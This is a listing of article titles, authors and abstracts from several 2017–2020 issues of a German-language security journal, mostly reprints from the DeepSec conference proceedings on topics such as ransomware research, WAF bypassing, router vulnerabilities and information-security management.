  • »Hast du die Sorge nie gekannt?« -- Tiefenpsychologische Zugänge zur Bedeutung der Angst. Theoretische Überlegungen und qualitative Interviewauswertung.
    Bernd Rieken
    Ausgehend von einem Zitat aus Goethes »Faust«, wird auf die grundlegende Bedeutung der Angst aus tiefenpsychologischer Sicht hingewiesen, was auch für die Sicherheitsforschung von Interesse sein kann. Gleichzeitig wird -- als die Angst milderndes Element -- der elementare Wunsch nach Identität und Ganzheit thematisiert, der eng verknüpft ist mit der Befriedigung intentionaler, zielkausaler Bedürfnisse. Die Frage, wie man in Interviews an diese Schichten der Persönlichkeit gelangen kann, wird am Beispiel einer Feldforschung zur Lawinenkatastrophe von Galtür thematisiert.

    Der Beitrag erscheint in leicht veränderter Form in: Popp, R.; Rieken, B.; Sindelar, B.: Zukunftsforschung & Psychodynamik. Zukunftsdenken zwischen Angst und Zuversicht. Münster, New York: Waxmann 2017, als Kap. 2.2.3 »Zukunftsangst, Risiko und psychodynamische Bewältigungsstrategien«, S.  18--35.
  • It’s about the administrative costs
    Marcus J. Ranum
    Everything that’s old is new again, and if you work in security long enough, you’ll see the same ideas reinvented and marketed as the new new thing. Or, you see solutions in search of a problem, dusted off and re-marketed in a new niche. I’ll talk about some of that, and make a few wild guesses for where this may wind up. Spoiler alert: security will not be a »solved« problem.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Malicious Hypervisor Threat -- Phase Two: How to Catch the Hypervisor
    Mikhail Utin, PhD
    In this article we’re addressing the matters discussed at DeepSec 2014 (Utin M. 2014) and 2016 (Utin M. 2016) including the current status of the Malicious Hypervisor (MH) project and the available information concerning it. The first part of our research - Phase 1 – was our analysis of a few publicly available documents concerning the MH threat, caused by the exploitation of virtualization and the out-of-band management vulnerabilities. The second part - Phase 2 – is about identifying Malicious Hypervisor activity, the discussion of discovery methods and, finally, the testing results of our HyperCatcher MH identification software. The matter of the MH threat is still evolving and we’re planning on to address that in the future in Phase 3. Unfortunately, there is no end to the story of virtualization, vulnerabilities and threats. It has started by the implementation of mainframe OS virtualization in a PC environment. The technology was thus transferred from closed and secure mainframe architecture to an open and diverse Internet world without any thought of possible security implications.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • BadGPO - Using Group Policy Objects for Persistence and Lateral Movement
    Immanuel Willi and Yves Kraft
    Group Policy is a feature which provides centralized management and configuration functions for the Microsoft operating system, application and user settings. Group Policy is simply the easiest way to reach out and configure computer and user settings on networks based on Active Directory Domain Services (AD DS). Such policies are widely used in enterprise environments to control settings of clients and servers: registry settings, security options, scripts, folders, software installation and maintenance, just to name a few. Settings are contained in so-called Group Policy Objects (GPOs) and can be misused in a sneaky way to distribute malware and gain persistence in an automated manner in a post exploitation scenario of an already compromised domain. In a proof of concept, inspired by Phineas Fishers' article about pwning HackingTeam, we will show how persistence and lateral movement in a compromised company network can be achieved, and demonstrate some PowershellEmpire Framework modules which we created. PowershellEmpire is basically a post-exploitation framework that utilises the widely-deployed PowerShell tool for all your system-smashing needs. There are already functionalities built-in regarding GPOs. We tried to further evolve the miss-use of GPOs in additional scenarios. Furthermore, we will discuss some countermeasures including detection and prevention mechanisms.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer

14. Ausgabe, 7. Jahrgang, Band 2, 2017

  • CSP Is Dead, Long Live CSP! - On the Insecurity of Whitelists and the Future of Content Security Policy
    by Lukas Weichselbaum and Michele Spagnuolo and Sebastian Lekies and Artur Janc
    Content Security Policy is a web platform mechanism designed to mitigate cross-site scripting (XSS), the top security vulnerability in modern web applications MITRE, 2014. In this paper, we take a closer look at the practical benefits of adopting CSP and identify significant flaws in real-world deployments that result in bypasses in 94.72% of all distinct policies.  We base our Internet-wide analysis on a search engine corpus of approximately 100 billion pages from over 1 billion hostnames; the result covers CSP deployments on 1,680,867 hosts with 26,011 unique CSP policies – the most comprehensive study to date. We introduce the security-relevant aspects of the CSP specification and provide an in-depth analysis of its threat model, focusing on XSS protections. We identify three common classes of CSP bypasses and explain how they subvert the security of a policy.  We then turn to a quantitative analysis of policies deployed on the Internet in order to understand their security benefits. We observe that 14 out of the 15 domains most commonly whitelisted for loading scripts contain unsafe endpoints; as a consequence, 75.81% of distinct policies use script whitelists that allow attackers to bypass CSP. In total, we find that 94.68% of policies that attempt to limit script execution are ineffective, and that 99.34% of hosts with CSP use policies that offer no benefit against XSS.  Finally, we propose the ’strict-dynamic’ keyword, an addition to the specification that facilitates the creation of policies based on cryptographic nonces, without relying on domain whitelists. We discuss our experience deploying such a nonce-based policy in a complex application and provide guidance to web authors for improving their policies.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Revisiting SOHO Router Attacks
    by Álvaro Folgado Rueda and José Antonio Rodríguez García and Iván Sanz de Castro
    Domestic routers have lately been targeted by cybercrime due to the huge amount of well-known vulnerabilities which compromise their security. The purpose of this paper is to appraise SOHO router security by auditing a sample of these devices and to research innovative attack vectors. More than 60 previously undisclosedsecurity vulnerabilities have been discovered throughout 22 popular home routers, meaning that manufacturers and Internet Service Providers have still much work to do on securing these devices. A wide variety of attacks could be carried out by exploiting the different types of vulnerabilities discovered during this research.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • HVACKer - Bridging the Air-Gap by Manipulating the Environment Temperature
    by Yisroel Mirsky and Mordechai Guri and Yuval Elovici
    Modern corporations physically separate their sensitive computational infrastructure from public or other accessible networks in order to prevent cyber-attacks. However, attackers still manage to infect these networks, either by means of an insider or by infiltrating the supply chain. Therefore, an attacker’s main challenge is to determine a way to command and control the compromised hosts that are isolated from an accessible network (e.g., the Internet).
    In this paper, we propose a new adversarial model that shows how an air gapped network can receive communications over a covert thermal channel. Concretely, we show how attackers may use a compromised air-conditioning system (connected to the internet) to send commands to infected hosts within an air-gapped network. Since thermal communication protocols are a rather unexplored domain, we propose a novel lineencoding and protocol suitable for this type of channel. Moreover, we provide experimental results to demonstrate the covert channel’s feasibility, and to calculate the channel’s bandwidth. Lastly, we offer a forensic analysis and propose various ways this channel can be detected and prevented.  We believe that this study details a previously unseen vector of attack that security experts should be aware of.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Social Engineering - The Most Underestimated APT -- Hacking the Human Operating System
    Dominique C. Brack
    Social Engineering is an accepted APT and is going to stay. Most of the high-value hacking attacks feature components of social engineering. Understanding of the methods and approaches used behind the scene of Social Engineering will help you to make the world a safer place. Or make your attack plans more successful.  This article is based on a book I recently wrote about Social Engineering. As a bonus I will present the readers with a free download code for ebook-versions (PDF, epub, mobi) of my book for further study
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer
  • Cryptographic Enforcement of Segregation of Duty
    Thomas Maus
    Workflows with Segregation-of-Duty requirements or involving multiple parties with non-aligned interests (typically mutually distrustful) pose interesting challenges in often neglected security dimensions.
    Cryptographic approaches are presented to technically enforce strict auditability, traceability and multi-partyauthorized access control, and thus also enable exoneration from allegations.
    These ideas are illustrated by challenging examples - constructing various checks and balances for Telecommunications data retention, a vividly discussed and widely known issue.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 2“. Edited by Stefan Schumacher and René Pfeiffer

15. Ausgabe, 8. Jahrgang, Band 1, 2018

  • Was ist Informationssicherheit? -- Positionierung, Chancen und Risiken
    von Dr. Hubert Feyrer
    Es werden die Besonderheiten von Informationen aufgezeigt und ihr Wert als schützenswertes Gut dargestellt.  Informationssicherheit wird erklärt und in Bezug zu verwandten Begriffen gesetzt.  Aspekte der Umsetzung lassen Raum für individuelle Entscheidungen um Chancen zu nutzen und Risiken zu bekämpfen. Dabei ist Risikomanagement ein zentrales Instrument.
    Stichwörter: Sicherheit, Informationssicherheit, Information, Datenschutz, Risikomanagement

16. Ausgabe, 8. Jahrgang, Band 2, 2018

  • I Wrote my Own Ransomware; did not make 1 iota of a Bitcoin
    by Thomas Fischer
    2016 saw a substantial rise in ransomware attacks and in some cases the return of some favourites with Cryptowall, CTB-LOCKER and TeslaCrypt being some of the most popular. The volume of attacks was in fact pretty steady for a good part of the year, with regular campaigns coming out on a weekly basis. It was interesting to see the variety in mechanisms used for the ransomware which not only included self-contained binaries but went all the way to the use of scripts. As part of the research I conducted last year, I wanted to understand why there's such a drive and lure for ransomware, outside of the victims payment, as well as have some way of properly testing »anti-ransomware« solutions with an unknown variant. So to do that, I went ahead and built my own ransomware and drew some conclusions on why it became so popular. This talk explore the background and process used to build a live ransomware that I was able to use for controlled testing. To finally draw some of my own personal conclusions.
    Keywords: Malware, Malware Analysis, Bitcoin, Encryption
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • Malware Analysis: Machine Learning Approaches
    by Chiheb Chebbi
    Machine learning is obviously the hottest trend in the tech industry at the moment, thanks to the huge amount of data collected in many organizations. It is so powerful to make decisions and predictions, based on big data.  Fraud detection, natural-language processing, self-driving cars and image recognition are a few examples of machine learning applications. Machine learning is a combination of statistics, computer science, linear algebra, and mathematical optimization methods.
    Keywords: Malware, Machine Learning, Malware Analysis, Deep Learning
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer

17. Ausgabe, 9. Jahrgang, Band 1, 2019

  • Web Application Firewall Bypassing -- An Approach for Penetration Testers
    by Khalil Bijjou
    Security experts perform security assessments of web applications in order to identify vulnerabilities that could be exploited by malicious users. Web Application Firewalls add a second layer of protection to web applications in order to mitigate these vulnerabilities. The attempt to bypass Web Application Firewalls is an important aspect of a security assessment and is necessary to ensure accurate results. This thesis describes bypass techniques and offers a systematic approach for security experts on how to bypass Web Application Firewalls based on these techniques. In order to facilitate this approach a tool has been developed. The outcomes of this tool have significantly contributed to finding multiple bypasses. These bypasses will be reported to the particular Web Application Firewall vendors and will presumably improve the security level of these Web Application Firewalls.
    Keywords: web application firewalls, penetration testing, bypass techniques, ethical hacking, red team
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • XFLTReaT - Unified Tunneling
    by Balazs Bucsay
     This paper aims to recognize the similarities between existing tunneling solutions and gives advice on possible framework implementation. The reference implementation can be found on Github under the name of XFLTReaT. With this framework it is possible to use only one tunneling program to use different transport protocols to tunnel data. This approach can help on both sides of the IT-security industry to implement new attack and defense scenarios.
    Keywords: Tunnel, Tunneling, Transport Protocol
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • Without a Trace - Cybercrime, who are the Defendants?
    by Edith Huber and Bettina Pospisil and Walter Seböck
    Since 2006, cases of computer crime in Austria have been recorded in official crime statistics under the collective term »Cybercrime«. While the authors also analysed the solved cybercrime cases of the last ten years (2006 - 2016) this article focuses on the unsolved cases which occurred during this period. Thus, those cases in which the Vienna Criminal Court did not reach a verdict are analysed through a file analysis conducted by an interdisciplinary team. The aim of the article is to gain more insight in the phenomenon cybercrime. Special focus lies in the actors of cybercrime (offenders and victims) as well as the heterogeneous approaches and motivations of offenders.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer

18. Ausgabe, 9. Jahrgang, Band 2, 2019

  • New Attack Vectors for Mobile Core Networks
    by Silke Holtmanns
    Mobile network operators connect towards each other through the private interconnection network (IPX). This closed private network enables international calls, data, messages and many other services across network and country borders.  It connects billions of users and Internet of Things devices. In the last years, evidence arose that the network has been misused for various kind of attacks. We will introduce the foundations of the interconnection network, give the security background. Outline existing attacks and describe a new charging attack. Various activities are ongoing to improve the security of the IPX network, which we will describe. We close with an overview of potential risk areas for 5G core networks.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • Efail and other Failures with Encryption and E-Mail -- Outdated Crypto Standards and HTML Mails as a Security Risk
    by Hanno Böck
    The Efail bug against encrypted e-mails showed a variety of problems with the interaction of outdated cryptography and HTML e-mails. This talk will give an overview of the flaws that led to Efail and some other fun attacks that followed it. 
    Efail is an attack against E-Mail encryption with both S/MIME and OpenPGP. It often allows attackers, able to observe the encrypted message, to construct modified messages that will send the encrypted content back to the attacker. When Efail was published earlier this year only incomplete fixes were available. For S/MIME the issue is still completely unfixed and it's likely to stay that way. 
    Efail combines two weaknesses: Both E-Mail encryption standards use outdated cryptography, particularly they don't use proper authenticated encryption. This allows attackers to modify transmitted messages. HTML mails give the sender of a mail a huge amount of control over what happens when rendering a mail. This can be abused in a variety of ways to send decrypted e-mail content to the attacker. After the first incomplete fixes for Efail the speaker was able to bypass the implemented fixes in Enigmail multiple times. The talk will go over the basics of Efail, discuss attacks and variations that followed it, and discuss some further attacks including SigSpoof and two yet undisclosed attacks.
  • Defense Informs Offense Improves Defense -- How to Compromise an Industrial Control Systems Network – and How to Defend it
    Joseph Slowik
    ICS attacks have an aura of sophistication, high barriers to entry, and significant investment in time and resources. When looking at the situation from a defender's perspective, nothing could be further from the truth. Attacking and potentially taking down an ICS network requires - and probably operates best - via permutations of pen tester 101 actions combined with some knowledge of the environment and living off the land.  In this paper, we will explore some concrete ICS attack examples to explore just what is needed to breach and impact this environment. More importantly, using malware and data captured from recent attacks - specifically TRISIS and CRASHOVERRIDE - we'll see how the attackers messed up their attacks and why a more simplified and direct approach to achieving offensive goals would not only be more effective, but likely far more difficult for defenders to catch as well. To close the conversation, we'll explore what defensive measures can be applied - and are necessary - to detect and stop such attacks in their tracks.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • Drones, the New Threat from the Sky
    Dominique C. Brack
    This paper is about drones. Drone risks and countermeasures. Drones have become an inherent risk not just for critical infrastructure but also public events (sports, concerts) and privacy. I wrote about the exclusive risk catalogue I have developed for a small highly secialised startup called DroneGuard. The catalogue contains over 140 detailed drone related risks. From payload of drones (explosives, chemicals, etc.) to cyberrisks like Signal Hacking and Disruption (WiFi, GSM, Bluetooth, RFID, etc.). Since Deepsec is a more technically oriented event I will highlight the risk management frame work, my experience with our personal payload drone and the cyber risks. This talk will help you if you have to protect critical infrastructure from a physical perspective, or if you have to protect yourself or your company from privacy implications.
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer
  • BitCracker: BitLocker meets GPUs
    Elena Agostini and Massimo Bernaschi
    BitLocker is a full-disk encryption feature available in recent Windows versions. It is designed to protect data by providing encryption for entire volumes and it makes use of a number of different authentication methods. In this work we present a solution, named BitCracker, to attempt the decryption, by means of a dictionary attack, of memory units encrypted by BitLocker with a user supplied password. To that purpose, we resort to GPU (Graphics Processing Units) that are, by now, widely used as general-purpose coprocessors in high performance computing applications.  BitLocker decryption process requires the execution of a very large number of SHA-256 hashes and also AES, so we propose a very fast solution, highly tuned for Nvidia GPU, for both of them. In addition we take the advantage of a weakness in the BitLocker decryption algorithm to speed up the execution of our attack.  We benchmark our solution using the three most recent Nvidia GPU architectures (Kepler, Maxwell and Pascal), carrying out a comparison with the Hashcat password cracker.  Finally, our OpenCL implementation of BitCracker has been recently released within John The Ripper, Bleeding-Jumbo version. 
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer

19. Ausgabe, 10. Jahrgang, Band 1, 2020

  • Building Your Own Web Application Firewall as a Service
    And Forgetting about False Positives

    by Juan Berner
    When a Web Application Firewall (WAF) is presented as a defensive solution to web application attacks, there is usually a decision to be made: Will the solution be placed inline (and risk affecting users due to outages or latency) or will it be placed out of band (not affecting users but not protecting them either). This paper will cover a different approach you can take when deciding how to use any WAF at your disposal, which is to try and get the best of both worlds, making the WAF work in passive mode out of band detecting attacks and in active mode by selectively routing traffic through your WAF to decide if it should block the request or allow it.
    To achieve this the paper will show how to abstract the WAF around a web service, something that developers are commonly used to working with, which can result in delivering security in a targeted and scalable manner. In this network agnostic setup, a WAF web service functionality can grow horizontally, allowing you to enhance the WAF decisions with your own business knowledge. This will mean that the decision to block or to route traffic through the WAF will not only depend on the WAF’s decision but also on data about your application and its context, which can significantly reduce the false positive rate up to the point of practically not existing.
    This paper will go through how such a service can be built with open source examples, what alternatives are there, depending on the flexibility of the WAF used, and how this approach can be used to manually decide on the false positive rate wanted and the desired business risk depending on the attack type and it’s possible impact.
    Keywords: WAF, Web Application Firewall, Security Architecture, Web Application
    This article appears in the special edition „In Depth Security – Proceedings of the DeepSec Conferences Vol. 3“. Edited by Stefan Schumacher and René Pfeiffer

20. Ausgabe, 10. Jahrgang, Band 2, 2020

  • Informationssicherheit in Versorgungsunternehmen umsetzen -- Einige praktische Erfahrungen
    von Stefan Schumacher
    Versorgungsunternehmen sind als Betreiber kritischer Infrastrukturen vielfältigen Angriffen aus dem Internet ausgesetzt. Sowohl einfache Bürorechner, Abrechnungssystem als auch Industriesteuerungsanlagen werden regelmäßig von verschiedenen Akteuren attackiert. Darunter fallen auch ungezielte automatisierte Massenangriffe.
    Der Beitrag zeigt, wie Sie Ihre Infrastruktur vor Angriffen schützen können, wie Sie dazu strategisch vorgehen müssen und welche technisch-organisatorische Maßnahmen implementiert werden sollten.  Desweiteren werden in einem Überblick Standards bzw. Richtlinien wie ISO 27001 oder das BSI Grundschutzkonzept vorgestellt.